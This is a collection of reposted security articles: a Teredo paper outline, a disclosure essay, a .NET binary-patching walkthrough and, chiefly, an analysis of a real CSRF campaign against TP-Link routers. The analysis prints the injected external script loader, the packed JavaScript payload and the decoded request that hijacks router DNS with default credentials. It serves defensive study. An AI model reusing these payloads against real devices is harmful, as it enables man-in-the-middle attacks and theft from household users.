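    return [math.sin(2 * math.pi * FREQ * i / RATE) for i in range(N)]

def goertzel_power(samples):
    """Signal power at FREQ via the Goertzel algorithm (single-bin DFT)."""
    coeff = 2 * math.cos(2 * math.pi * FREQ / RATE)
    s_prev = s_prev2 = 0.0
    for x in samples:
        s = x + coeff * s_prev - s_prev2
        s_prev2, s_prev = s_prev, s
    return s_prev2 ** 2 + s_prev ** 2 - coeff * s_prev * s_prev2

def demodulate(samples):
    """Recover bits by thresholding per-period power at the carrier."""
    return [1 if goertzel_power(samples[i:i + N]) > N else 0
            for i in range(0, len(samples), N)]

signal = [s for bit in (1, 0, 1, 1, 0) for s in tone(bit)]
print(demodulate(signal))  # -> [1, 0, 1, 1, 0]
```

Over a real acoustic channel, noise, speaker and microphone frequency response, and synchronization make this considerably harder, but nothing about it requires exotic hardware.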
-
The Teredo Protocol: Tunneling Past Network Security and Other Security Implications

Dr. James Hoagland
Principal Security Researcher
Symantec Advanced Threat Research

Contents:

Introduction
Overview: How Teredo works
    Teredo components
    Teredo setup
    Teredo addresses
    Origin data
    Qualification procedure
    Secure qualification
    Bubble packets and creating a NAT hole
    Packet relaying and peer setup for non-Teredo peers
        Finding a relay from IPv6
        Ping test and finding a relay from IPv4
    Packet relaying and peer setup for Teredo peers
    Trusted state
    Required packet filtering
Teredo security considerations
    Security of NAT types
    Teredo’s open-ended tunnel (a.k.a. extra security burden on end host)
        Allowed packets
        Teredo and IPv6 source routing
        IPv4 ingress filtering bypass
        Teredo and bot networks
        Teredo implications on ability to reach a host through a NAT
    Information revealed to third parties
    Teredo anti-spoofing measures
        Peer address spoofing
        Server spoofing
    Denial of Teredo service
        Storage-based details
        Relay DOS
        Server DOS
    Scanning Teredo addresses compared with native IPv6 addresses
        Finding a Teredo address for a host
        Finding any Teredo address for an external IPv4 address
        Finding any Teredo address on the Internet
        Scanning difficulties compared
    The effect of Teredo service on worms
    Attack pieces
        Getting Teredo components to send packets to third parties
        Inducing a client to make external connections
        Selecting a relay via source routing
        Finding the IPv4 side of an IPv6 node’s relay
Teredo mitigation
Conclusion
Future work
Acknowledgments
References

Download: http://www.symantec.com/avcenter/reference/Teredo_Security.pdf
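One detail behind the "Teredo addresses" and "Scanning Teredo addresses" sections above is worth illustrating: per RFC 4380, a Teredo address (prefix 2001:0::/32) embeds the Teredo server's IPv4 address, a flags field, and the client's NAT-mapped UDP port and public IPv4 address, with the last two obfuscated by XOR-ing with all-ones bits. A sketch of the decoding follows; the example address is a commonly cited Teredo example, not one taken from the paper.

```python
import ipaddress

def parse_teredo(addr):
    """Unpack the fields RFC 4380 embeds in a 2001:0::/32 Teredo address."""
    b = ipaddress.IPv6Address(addr).packed
    server = str(ipaddress.IPv4Address(b[4:8]))          # Teredo server IPv4
    flags = int.from_bytes(b[8:10], "big")               # e.g. 0x8000 = cone NAT
    port = int.from_bytes(b[10:12], "big") ^ 0xFFFF      # client UDP port, XOR-obscured
    client = str(ipaddress.IPv4Address(bytes(x ^ 0xFF for x in b[12:16])))
    return server, flags, port, client

print(parse_teredo("2001:0:4136:e378:8000:63bf:3fff:fdd2"))
# -> ('65.54.227.120', 32768, 40000, '192.0.2.45')
```

This structure is also why the paper can discuss scanning Teredo addresses in terms of guessing IPv4 addresses and ports rather than searching the full 2^128 IPv6 space.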
-
Disclosure of Vulnerabilities and Exploit Code is an Essential Capability

Posted by Darren Meyer in RESEARCH, October 30, 2013

Robert Lemos has an excellent summary of the state of the debate on disclosure of exploit code in his column at Dark Reading. In it, I'm quoted briefly:

Software vulnerabilities are often discovered independently, suggesting that silencing the disclosure of a vulnerability and how to exploit the flaw would merely allow a bad actor more time to use an attack, says Darren Meyer, senior security researcher at Veracode, an application security firm. "It is really important for the disclosure, or even the release of code, to be a possibility," he says. "The legal restraint of that would be a very bad practice."

But that's really only part of the story — disclosure is a complicated topic. It's easy to understand the point of view of a defender: details of a specific vulnerability or even example exploit code are scary. Their existence means you as a defender have a very short period of time to react; you have to prioritize that fix instead of rolling it into a planned update, because attackers now have a ready-made path to attack you. These concerns are exactly why Veracode takes such pains to keep the vulnerabilities we discover in our customers' applications confidential.

It's just as easy to understand the point of view of a researcher: their reputations—and thus their livelihoods—depend upon their ability to discover and document vulnerabilities. If they can't share this information, it becomes very hard for the community and industry to evaluate their abilities objectively. Additionally, the sharing of information about vulnerabilities is essential to advancing the state of the art of defense. We learn from each other, and we apply that knowledge to better defenses.

Both sets of concerns are valid. It would be detrimental to security if every vulnerability discovered were immediately disclosed along with a working exploit.
It would be just as bad if researchers were constrained from ever sharing their findings. After all, we're on the same side—we all want higher-quality software. Fortunately for us, there are various approaches to responsible disclosure, all of which have a few key attributes:

- The vulnerability is disclosed first to people who have the ability to repair it
- The details are kept confidential for a reasonable and agreed-upon period of time to allow the vulnerable party to engineer and properly test and deploy a fix
- Once the vulnerability is fixed (or once a reasonable time to fix has passed), the researcher publishes the details

This general framework for responsibly disclosing vulnerabilities strikes an excellent balance among the various concerns of defender, researcher, and user.

The defender is given an opportunity to benefit from the researcher's findings. But using this method also allows them to treat the vulnerability like other production defects: it can be appropriately prioritized, the fix can be engineered soundly, and the system can be thoroughly tested before the fix is deployed. Being able to treat a security flaw with the same QA measures as any other production defect results in higher-quality software. At the same time, unaffected defenders are able to learn from the mistakes of others and avoid them in their own systems. This makes everyone safer.

The researcher retains his or her ability to share important findings with the research and defense communities, advancing the state of the art in research and defense and providing useful opportunities for further academic study. He or she also retains the leverage of disclosure as a way to ensure that the vulnerable party takes the issue seriously—the vulnerability will be disclosed, and so it must be repaired.

Each user of the system comes out ahead as well. Ideally, they get to see that a vulnerability was discovered and repaired by learning about the vulnerability after the fix is already in place.
And if not, they can trust that they'll learn about a vulnerability that affects them should the defender fail in their duty to repair it. On top of that, the user benefits from the better defenses that result from information about vulnerabilities being publicly available.

Responsible disclosure of vulnerabilities—including the details and even example exploits—simply works for everyone.

Sursa: https://www.veracode.com/blog/2013/10/disclosure-of-vulnerabilities-and-exploit-code-is-an-essential-capability/
-
The DEFCON21 Social Engineer Capture The Flag Report

Table of Contents:

Executive Summary
Overview of the SECTF
    Background and Description
    Description of the 2013 Parameters
    Target Companies
    Competitors
    Flags
    Scoring
    Rules of Engagement (R.O.E)
Results & Analysis
    Open Source Information Gathering
    Pretexting
    Live Call Performance
    Final Contest Results
    Discussion
    Mitigation
        1. Corporate Information Handling and Social Media Policies
        2. Consistent, Real World Education
        3. Regular Risk Assessment and Penetration Test
About Social-Engineer, Inc
Sponsors

Download: http://www.social-engineer.org/defcon21/DC21_SECTF_Final.pdf
-
.NET: Binary Modification Walkthrough

As I kept promising but failing to do, as I am an unregenerate procrastinator, here is a step-by-step of the binary modification I demonstrated during my Summercon, NordicSec, and Brucon talks. I chose Red Gate Reflector for my target app– partly for the "Yo dawg"/ Inception jokes, and partly because, as we'll see later in this blog post, the folks at Red Gate seem to have a bit of a sense of humor about such things.

As with most binaries you'll end up working with, Reflector is obfuscated. The obfuscation used here is SmartAssembly– not surprising, since this is Red Gate's obfuscation product. This is easily confirmed using the de4dot deobfuscator:

>de4dot.exe -d "C:\Program Files (x86)\Red Gate\.NET Reflector\Desktop 8.0\Reflector.exe"
de4dot v2.0.3.3405 Copyright (C) 2011-2013 de4dot@gmail.com
Latest version and source code: https://bitbucket.org/0xd4d/de4dot
Detected SmartAssembly 6.6.0.147 (C:\Program Files (x86)\Red Gate\.NET Reflector\Desktop 8.0\Reflector.exe)

Opening the binary in Reflector in its original state, we can clearly see signs of obfuscation. Symbols have been renamed to garbage characters and methods cannot be displayed. Some, however, have their original names. Well played, Red Gate. I dub this the "RedRoll."

Running the app through de4dot improves the readability somewhat and reverts the binary enough that methods can be resolved. However, since the original symbol data has not been stored, the deobfuscator is forced to assign generic names:

Now that we have a deobfuscated binary, we can start to analyze and modify it. I've been relying on two add-ons to make this easier: CodeSearch (as Red Gate's native search functionality is somewhat lacking) and Reflexil (for assembly modification). For this demonstration, I decided to modify Reflector to add some functionality that I felt was sorely lacking. My goal is to introduce new code into the binary and add a toolbar icon to launch it.
Since we mostly have generic symbols to work with, it's going to be a bit more of a challenge to identify where existing functionality is implemented as well as where to inject our own code. When analyzing a binary, it helps to start with a list of goals, or at the very least touchpoints that you wish to reach. This list will undoubtedly change as you become more familiar with the app; however, it will help provide structure to your analysis. This especially helps if, like me, you tend to jump around haphazardly as new ideas pop in your head. For this particular undertaking, I fleshed out the following steps:

1. Identify where toolbar icons are created and add an icon representing the new functionality I'll add
2. Identify where toolbar icons are linked to the functionality/functions they invoke
3. Insert an assembly reference to a DLL I've created into the application
4. Create a new function inside Reflector invoking the functionality implemented in my DLL
5. Link my tool icon to my own function

Because symbol renaming was one of the obfuscation techniques performed on this binary, locating the toolbar implementation will require a little digging, but not much. By searching for one of the strings displayed when mousing over a toolbar icon, "Assembly Source Code…," I was able to determine the toolbar is implemented in Class269.method_26().

Making an educated guess from the code above, the toolbar is created by various calls to Class269.method_29(), passing in the toolBar, the image icon, the mouse over text, keybindings, and a string referring to the function invoked when the icon is clicked. In order to add my own toolbar icon, I'll need to add another of these calls. This can be done using Reflexil to inject the IL code equivalent, as seen below. The IL written to add the appropriate call is:

IL_01ae: ldarg.0
IL_01af: ldarg.1
IL_01b0: call class [System.Drawing]System.Drawing.Image ns36.Class476::get_Nyan()
IL_01b5: ldstr "Nyan!"
IL_01ba: ldc.i4.0
IL_01bb: ldstr "Application.Nyan"
IL_01c0: call instance void ns30.Class269::method_29(class Reflector.ICommandBar, class [System.Drawing]System.Drawing.Image, string, valuetype [System.Windows.Forms]System.Windows.Forms.Keys, string)
IL_01c5: ldarg.1
IL_01c6: callvirt instance class Reflector.ICommandBarItemCollection Reflector.ICommandBar::get_Items()
IL_01cb: callvirt instance class Reflector.ICommandBarSeparator Reflector.ICommandBarItemCollection::AddSeparator()
IL_01d0: pop

PROTIP: If you're lost on what IL instructions to add, try writing a test app in C# or VB .NET, then use the Disassembly Window in Visual Studio or the IL view in Reflector to see the equivalent IL.

You can see that in this IL, I make a call to ns36.Class476::get_Nyan(). This is a function that I'll create that returns a System.Drawing.Image object representing the icon to be displayed in the toolbar. I'll also need to find out where to associate the "Application.Nyan" string with the function that actually calls the functionality I wish to invoke.

Doing a bit of digging into the Class476 functions, I end up determining that they are returning the images by slicing off 16×16 portions of CommandBar16.png. This means that I can add my toolbar icon to this image, which lives in the Resources section of the binary, and carve it off as well:

I can then add the get_Nyan() function, modeling it off of the other image-carving functions in Class476.

.method public hidebysig specialname static class [System.Drawing]System.Drawing.Image get_Nyan() cil managed
{
    .maxstack 2
    .locals init (
        [0] class [System.Drawing]System.Drawing.Image image)
    L_0000: ldsfld class [System.Drawing]System.Drawing.Image[] ns36.Class476::image_0
    L_0005: ldc.i4.s 40
    L_0007: ldelem.ref
    L_0008: stloc.0
    L_0009: leave.s L_000b
    L_000b: ldloc.0
    L_000c: ret
}

With that done, I need to find where those pesky strings are linked to actual function calls.
By searching for one of the strings ("Application.OpenFile,") I find it referenced in two functions that look promising: Execute() and QueryStatus(). Looking inside Class269.Execute, I see that this function creates a dictionary mapping these strings to function calls.

public void Execute(string commandName)
{
    string key = commandName;
    if (key != null)
    {
        int num;
        if (Class722.dictionary_4 == null)
        {
            Dictionary<string, int> dictionary1 = new Dictionary<string, int>(0x10);
            dictionary1.Add("Application.OpenFile", 0);
            dictionary1.Add("Application.OpenCache", 1);
            dictionary1.Add("Application.OpenList", 2);
            dictionary1.Add("Application.CloseFile", 3);
            …
            Class722.dictionary_4 = dictionary1;
        }
        if (Class722.dictionary_4.TryGetValue(key, out num))
        {
            switch (num)
            {
                case 0: this.method_45(); break;
                case 1: this.method_46(); break;
                case 2: this.method_47(); break;
                …
}

QueryStatus() is structured in much the same way. I add my own dictionary entry mapping "Application.Nyan" to the function nyan() with the following IL to add the dictionary key…

IL_00d5: dup
IL_00d6: ldstr "Application.Nyan"
IL_00db: ldc.i4.s 16
IL_00dd: call instance void class [mscorlib]System.Collections.Generic.Dictionary`2<string, int32>::Add(!0, !1)

…and the function mapping:

IL_01c0: ldarg.0
IL_01c1: call instance void ns30.Class269::nyan()
IL_01c6: leave.s IL_01c8

You'll notice above that I reference a function called nyan(). This is the function I'll use that will implement the functionality the icon click will invoke. I could write this functionality entirely in IL, but I'm actually not much of a masochist. What I decided to do instead was to write a DLL containing the functionality I wanted.
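The string-keyed command dispatch in Execute() and QueryStatus() is what makes this patch straightforward: adding functionality is just one more table entry plus a handler that a UI element can point at by name. A minimal Python sketch of the same pattern (class and command names here are illustrative, not Reflector's actual internals):

```python
# Sketch of the command-dispatch pattern seen in Class269.Execute():
# command-name strings map to handlers, so injecting a feature amounts
# to registering one more entry under a new key.
class CommandBar:
    def __init__(self):
        self._handlers = {}

    def register(self, command_name, handler):
        self._handlers[command_name] = handler

    def execute(self, command_name):
        handler = self._handlers.get(command_name)
        if handler is not None:
            return handler()

bar = CommandBar()
bar.register("Application.OpenFile", lambda: "open-file dialog")
bar.register("Application.Nyan", lambda: "nyan!")  # the injected command
print(bar.execute("Application.Nyan"))  # -> nyan!
```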
This assembly, derp.dll, was added as an assembly reference as follows:

I can then insert IL for the nyan() function into Class269:

.method private hidebysig instance void nyan() cil managed
{
    .maxstack 8
    L_0000: newobj instance void [derp]derp.hurr::.ctor()
    L_0005: callvirt instance void [derp]derp.hurr::showForm()
    L_000a: ret
}

This is about all the modification needed, but now I need to address the Strong Name Signing on the binary, otherwise I will not be able to save and execute these changes. There are various tutorials on this subject, but for the purposes of this project I simply enabled Strong Name bypass for this application, as is described here. Reflexil will also allow you to do this upon saving the modified binary.

With the binary saved, I can now launch it. Now, if anything has been done incorrectly, your application will crash with a .NET runtime error either when you launch it or when trying to invoke the new functionality. For this reason, I saved my work and checked that it executed properly periodically throughout the process above. Below shows my new toolbar icon and the result of clicking it:

I feel that Nyan mode greatly enhances the Reflector user experience and hope that RedGate will consider adding it to a future release.

Sursa: .NET: Binary Modification Walkthrough | I am not interesting enough to have a blog.
-
Real-World CSRF attack hijacks DNS Server configuration of TP-Link routers

Contents:

Introduction
Analysis of the exploit
Analysis of the CSRF payload
Consequences of a malicious DNS server
Prevalence of the exploit
Recommendations to mitigate the problem
Affected Devices
References

Introduction

Today the majority of wired Internet connections are used with an embedded NAT router, which allows using the same Internet connection with several devices in parallel and also provides some protection against incoming attacks from the Internet. Most of these routers can be configured via a web interface. Unfortunately, many of these web interfaces suffer from common web application vulnerabilities such as CSRF, XSS, insecure authentication and session management, or command injection. In the past years countless vulnerabilities have been discovered and publicly reported. Many of them have remained unpatched by vendors, and even if a patch is available, it is typically only installed on a small fraction of the affected devices.

Despite these widespread vulnerabilities there have been very few public reports of real-world attacks against routers so far. This article exposes an active exploitation campaign against a known CSRF vulnerability (CVE-2013-2645) in various TP-Link routers. When a user visits a compromised website, the exploit tries to change the upstream DNS server of the router to an attacker-controlled IP address, which can then be used to carry out man-in-the-middle attacks.

Analysis of the exploit

This section describes one occurrence of the exploit. I have seen five different instances of the exploit on unrelated websites so far, and the details of the obfuscation differ between them. However, the actual requests generated by the exploits are the same except for the DNS server IP addresses.

As you would expect for malicious content added to a website, the exploit is hidden in obfuscated javascript code.
The first step is a line of javascript appended to a legitimate javascript file used by the website: document.write("<script type=\"text/javascript\" src=\"http://www.[REDACTED].com/js/ma.js\">"); It is possible that the cybercrooks append this line to various javascript files on compromised web servers in an automated way. This code just dynamically adds a new script tag to the website in order to load further javascript code from an external server. The referenced file “ma.js” contains the following encoded javascript code: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('T w$=["\\E\\6\\5\\m\\o\\3\\q\\5\\m\\8\\3\\7\\"\\5\\3\\G\\5\\j\\r\\6\\6\\"\\y\\B\\d\\e\\8\\v\\4\\5\\q\\u\\4\\o\\H\\n\\5\\5\\8\\A\\j\\j\\a\\i\\e\\d\\f\\A\\a\\i\\e\\d\\f\\B\\2\\k\\h\\1\\2\\g\\9\\1\\2\\1\\2\\j\\u\\6\\3\\4\\z\\8\\e\\j\\s\\a\\f\\F\\n\\r\\8\\C\\3\\4\\l\\3\\4\\z\\8\\e\\1\\n\\5\\e\\I\\i\\n\\r\\8\\6\\3\\4\\l\\3\\4\\7\\2\\c\\d\\8\\2\\7\\2\\k\\h\\1\\2\\g\\9\\1\\2\\1\\2\\b\\b\\c\\d\\8\\h\\7\\2\\k\\h\\1\\2\\g\\9\\1\\2\\1\\2\\k\\k\\c\\s\\3\\a\\6\\3\\7\\2\\h\\b\\c\\Q\\a\\5\\3\\x\\a\\m\\7\\b\\1\\b\\1\\b\\1\\b\\c\\i\\v\\e\\a\\d\\f\\7\\c\\i\\f\\6\\6\\3\\4\\l\\3\\4\\7\\2\\b\\g\\1\\2\\9\\P\\1\\D\\g\\1\\9\\R\\c\\i\\f\\6\\6\\3\\4\\l\\3\\4\\h\\7\\9\\1\\9\\1\\9\\1\\9\\c\\C\\a\\l\\3\\7\\p\\t\\2\\p\\S\\D\\O\\p\\t\\K\\p\\J\\g\\L\\N\\E\\j\\6\\5\\m\\o\\3\\y\\q"];M["\\x\\4\\d\\5\\3\\o\\f"](w$[0]);',56,56,'|x2e|x31|x65|x72|x74|x73|x3d|x70|x38|x61|x30|x26|x69|x6d|x6e|x36|x32|x64|x2f|x39|x76|x79|x68|x6c|x25|x20|x63|x4c|x42|x75|x6f|_|x77|x3e|x52|x3a|x40|x53|x33|x3c|x44|x78|x28|x3f|x45|x34|x29|document|x3b|x2b|x37|x67|x35|x41|var'.split('|'),0,{})) At first this code looks quite complicated and you probably don’t want to manually analyze 
and decode it. However, it is clearly visible that the file just contains one big eval call. The parameter to eval (the code which is executed) is dynamically computed by an anonymous function based on the parameters p,a,c,k,e,d. A little bit of googling for “eval(function(p,a,c,k,e,d)” shows that this is the result of a publicly available javascript obfuscator. There are several online javascript deobfuscators you can use to reverse engineer the packed javascript. Alternatively, you can also just replace “eval” with “console.log” and then paste the code to the javascript console of Chrome Developer Tools. This just prints out the decoded javascript, which would otherwise be passed to eval. The result of the decoding is the following code: var _$ = ["\x3c\x73\x74\x79\x6c\x65\x20\x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\x2f\x63\x73\x73\"\x3e\x40\x69\x6d\x70\x6f\x72\x74\x20\x75\x72\x6c\x28\x68\x74\x74\x70\x3a\x2f\x2f\x61\x64\x6d\x69\x6e\x3a\x61\x64\x6d\x69\x6e\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x2f\x75\x73\x65\x72\x52\x70\x6d\x2f\x4c\x61\x6e\x44\x68\x63\x70\x53\x65\x72\x76\x65\x72\x52\x70\x6d\x2e\x68\x74\x6d\x3f\x64\x68\x63\x70\x73\x65\x72\x76\x65\x72\x3d\x31\x26\x69\x70\x31\x3d\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x30\x30\x26\x69\x70\x32\x3d\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x39\x39\x26\x4c\x65\x61\x73\x65\x3d\x31\x32\x30\x26\x67\x61\x74\x65\x77\x61\x79\x3d\x30\x2e\x30\x2e\x30\x2e\x30\x26\x64\x6f\x6d\x61\x69\x6e\x3d\x26\x64\x6e\x73\x73\x65\x72\x76\x65\x72\x3d\x31\x30\x36\x2e\x31\x38\x37\x2e\x33\x36\x2e\x38\x35\x26\x64\x6e\x73\x73\x65\x72\x76\x65\x72\x32\x3d\x38\x2e\x38\x2e\x38\x2e\x38\x26\x53\x61\x76\x65\x3d\x25\x42\x31\x25\x41\x33\x2b\x25\x42\x34\x25\x45\x36\x29\x3b\x3c\x2f\x73\x74\x79\x6c\x65\x3e\x20"]; document["\x77\x72\x69\x74\x65\x6c\x6e"](_$[0]); Although this code is still obfuscated, it can easily be understood by decoding the hex-encoded strings. 
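Rather than decoding the escapes by hand, the hex-encoded strings can be expanded mechanically. A quick Python illustration (not part of the original exploit, shown only to demonstrate the decoding step on one short excerpt):

```python
# The exploit's string table is built from JavaScript "\xNN" escapes.
# Python's unicode_escape codec understands the same notation, so an
# excerpt (the escaped spelling of one method name) decodes directly:
escaped = "\\x77\\x72\\x69\\x74\\x65\\x6c\\x6e"   # literal text: \x77\x72...
decoded = escaped.encode("ascii").decode("unicode_escape")
print(decoded)  # -> writeln
```

The same one-liner applied to the full string array yields the CSS/URL payload discussed below.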
The string "\x77\x72\x69\x74\x65\x6c\x6e" is the hex-encoded version of "writeln", and given the way object-oriented programming in javascript works, the line 'document["\x77\x72\x69\x74\x65\x6c\x6e"](_$[0]);' is just a fancy way of writing 'document.writeln(_$[0]);'. The array element _$[0] contains the data which is written to the document, and after decoding the escaped hex characters you get the following equivalent code:

document.writeln('<style type="text/css">@import url(http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=106.187.36.85&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6);</style>')

So the obfuscated javascript adds a style tag to the current html document. The css in this style tag uses @import to instruct the browser to load additional css data from 192.168.1.1, which is the default internal IP address of most NAT routers. So it is obviously a CSRF attack which tries to reconfigure the router. The following section shows an analysis of what the request does with some TP-Link routers.

Analysis of the CSRF payload

It is obvious that the payload tries to reconfigure the options for the DHCP server included in the router at 192.168.1.1. While the parameters also include the start/end of the DHCP IP address range, the main purpose of the exploit is to change the primary DNS server to 106.187.36.85. The secondary nameserver points to a publicly available recursive DNS server (in this case the public DNS server provided by Google) in order to make sure that the user doesn't notice any connectivity problems in case the attacker-controlled nameserver is (temporarily) unavailable for any reason. Searching for the string "userRpm/LanDhcpServerRpm" quickly revealed that the exploit is targeting TP-Link routers.
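The individual parameters of the decoded request can be pulled apart with a standard query-string parser. A small Python sketch (the Save parameter, apparently a GB2312-encoded button label, is omitted here so the query stays plain ASCII):

```python
from urllib.parse import urlsplit, parse_qs

# Re-assemble the decoded request for inspection (Save parameter omitted).
url = ("http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm"
       "?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120"
       "&gateway=0.0.0.0&domain=&dnsserver=106.187.36.85&dnsserver2=8.8.8.8")

parts = urlsplit(url)
params = parse_qs(parts.query, keep_blank_values=True)

print(parts.username, parts.password)   # admin admin  (default credentials)
print(parts.hostname)                   # 192.168.1.1  (router's LAN address)
print(params["dnsserver"][0])           # 106.187.36.85 (attacker-controlled)
print(params["dnsserver2"][0])          # 8.8.8.8       (Google DNS fallback)
```

Laid out like this, the intent is hard to miss: everything except the two dnsserver parameters merely restates the router's default DHCP configuration.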
The fact that some TP-Link routers are vulnerable to CSRF attacks has already been publicly reported [1] by Jacob Holcomb in April 2013, and TP-Link has fixed this problem for some devices since then. Experiments have shown that several TP-Link routers are actually vulnerable to this CSRF attack (see below for an incomplete list of affected devices).

It is also worth noting that a web server should use POST instead of GET for all actions that make persistent changes to the router. This can protect against attacks in some scenarios where the attacker can only trigger loading a given URL, e.g. by posting an image to a public discussion board or sending an HTML email (which could also be used to trigger attacks like this if the victim has enabled loading of remote images). However, even a POST request to the router can be issued in an automated way if the attacker can execute javascript code in the client browser. So in order to further protect against CSRF, the server should either add a securely generated CSRF token or use strict referer checking (which is easier to implement on embedded devices).

The affected TP-Link routers use HTTP Basic Authentication to control access to the web interface. When entering the credentials to access the web interface, the browser typically asks the user whether he wants to permanently store the password in the browser. However, even if the user doesn't want to permanently store the password, the browser will still temporarily remember it and use it for the current session. Since the session is only controlled by the browser behavior, the router can't actively terminate the session, e.g. after a certain timeout or when clicking a logout button. Due to this limitation of HTTP Basic Authentication, the configuration web interface has no logout button at all, and the only way to terminate the session is closing and reopening the browser.
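Returning to the CSRF-token recommendation above: a minimal per-session token can be an HMAC over a server-side secret. The following Python sketch is purely illustrative (TP-Link's firmware is not written in Python, and every name here is invented for the example):

```python
import hashlib
import hmac
import secrets

# Illustrative only: a per-session secret kept server-side.
session_secret = secrets.token_bytes(32)

def issue_token(form_id: str) -> str:
    """Derive a CSRF token for a given form from the session secret."""
    return hmac.new(session_secret, form_id.encode(), hashlib.sha256).hexdigest()

def check_token(form_id: str, presented: str) -> bool:
    """Constant-time comparison against the expected token."""
    return hmac.compare_digest(issue_token(form_id), presented)

token = issue_token("LanDhcpServerRpm")
print(check_token("LanDhcpServerRpm", token))        # True: genuine form post
print(check_token("LanDhcpServerRpm", "guessed"))    # False: forged request
```

A forged cross-site request cannot know the session secret and therefore cannot produce a token the check accepts, which is exactly what the GET-based exploit above relies on being absent.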
The CSRF exploit also includes the default credentials (username=admin, password=admin) in the URL. However, even if a username/password combination is given in the URL, the browser will ignore the credentials from the URL and still try the saved credentials or no authentication first. Only if this results in an HTTP 401 (Unauthorized) status code does the browser resend the request with the credentials from the URL. Due to this browser behavior, the exploit works if the user is either logged in to the router or if the standard password hasn't been changed.

Consequences of a malicious DNS server

When an attacker has changed the upstream DNS server of a router, he can then carry out arbitrary man-in-the-middle attacks against users of the compromised router. Here is a list of several possible actions which can be carried out by redirecting certain DNS hostnames to an attacker server:

* Redirect users to phishing sites when opening a legitimate website
* Redirect users to browser exploits
* Block software upgrades
* Attack software updaters which don't use cryptographic signatures
* Replace advertisements on websites by redirecting adservers (that's what the dnschanger malware did [2])
* Replace executable files downloaded from the official download site of legitimate software vendors
* Hijack email accounts by stealing the password if the mail client doesn't enforce usage of TLS/SSL with a valid certificate
* Intercept communication between Android/iOS apps and their back-end infrastructure

As of now I do not know what kind of attacks the cybercrooks carry out with the malicious DNS servers. I have done some automated checks, resolved a large number of popular domain names with one of the DNS servers used for the attack, and compared the results against a self-hosted recursive resolver. Due to the prevalence of round-robin load-balancing on DNS level and location-dependent redirection used e.g.
by CDNs (content delivery networks), this automated comparison did result in a huge number of false positives, and due to time constraints I could only manually verify those IP addresses which appear for a significant number of different hostnames. None of them turned out to be a malicious manipulation. However, it is very well possible that the infected routers are used for targeted attacks against a limited number of websites. If you find out what kind of attacks are carried out using the malicious DNS servers, please drop me an email or leave a comment in my blog.

Prevalence of the exploit

I discovered this exploitation campaign with an automated client honeypot system. Until now I have spotted the exploit five times on totally unrelated websites. During that time the honeypot generated some 280 GB of web traffic. There were some differences in the obfuscation used for the exploit, but the actual CSRF requests generated are basically the same. The five instances of the exploit tried to change the primary nameserver to three different IP addresses, and it is likely that there are more of them which I haven't spotted so far.

Recommendations to mitigate the problem

If you are using an affected TP-Link router, you should perform the following steps to prevent it from being affected by this exploit:

* Check whether the DNS servers have already been changed in your router
* Upgrade your router to the latest firmware.
The vulnerability has already been patched at least for some devices
* If you don't get an upgrade for your model from TP-Link, you may also check whether it is supported by OpenWRT
* Change the default password to something more secure (if you haven't already done so)
* Don't save your router password in the browser
* Close all other browser windows/tabs before logging in to the router
* Restart your browser when you're finished using the router web interface (since the browser stores the password for the current browser session)

Affected Devices

I have already checked whether some TP-Link routers I had access to are vulnerable to the attack. Some devices do contain the vulnerability but are by default not affected by the exploits I've seen so far because they are not using the IP address 192.168.1.1 in the default configuration.

TP-Link WR1043ND V1 up to firmware version 3.3.12 build 120405 is vulnerable (version 3.3.13 build 130325 and later is not vulnerable)
TP-Link TL-MR3020: firmware version 3.14.2 Build 120817 Rel.55520n and version 3.15.2 Build 130326 Rel.58517n are vulnerable (but not affected by current exploit in default configuration)
TL-WDR3600: firmware version 3.13.26 Build 130129 Rel.59449n and version 3.13.31 Build 130320 Rel.55761n are vulnerable (but not affected by current exploit in default configuration)
WR710N v1: 3.14.9 Build 130419 Rel.58371n is not vulnerable

It is likely that some other devices are vulnerable as well. If you want to know whether your router is affected by this vulnerability, you can find out by performing the following steps:

1. Open a browser and log in to your router
2. Navigate to the DHCP settings and note the DNS servers (it may be 0.0.0.0, which means that it uses the DNS server from your router's upstream internet connection)
3. Open a new browser tab and visit the following URL (you may have to adjust the IP addresses if your router isn't using 192.168.1.1): http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=8.8.4.4&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6
   If your router is vulnerable, this changes the DNS servers to 8.8.4.4 and 8.8.8.8 (the two IP addresses from Google Public DNS). Please note that the request also reverts the DHCP IP range and lease time to the default values.
4. Go back to the first tab and reload the DHCP settings in the router web interface
5. If you see the servers 8.8.4.4 and 8.8.8.8 for primary and secondary DNS, your router is vulnerable.
6. Revert the DNS settings to the previous settings from step 2
7. If your router is vulnerable, you may also upgrade it to the latest firmware and check whether it is still vulnerable.

Feel free to drop me an email or post a comment with your model number and firmware version so that I can add the device to the list above.

References

[1]: TP-LINK WR1043N Hacked, Rooted
[2]: https://en.wikipedia.org/wiki/DNSChanger

This entry was posted in Security by Jakob.

Sursa: Real-World CSRF attack hijacks DNS Server configuration of TP-Link routers | Jakob Lell's Blog
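As an addendum to the manual test in steps 1 to 7 above: the same authenticated request can be prepared with Python's standard library. This is a hedged sketch, not part of the original article; the actual network call is left commented out and must only ever be pointed at your own router:

```python
import urllib.request

# Self-test against YOUR OWN router only; adjust these values to your device.
ROUTER = "192.168.1.1"
USER, PASSWORD = "admin", "admin"

url = ("http://" + ROUTER + "/userRpm/LanDhcpServerRpm.htm?dhcpserver=1"
       "&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0"
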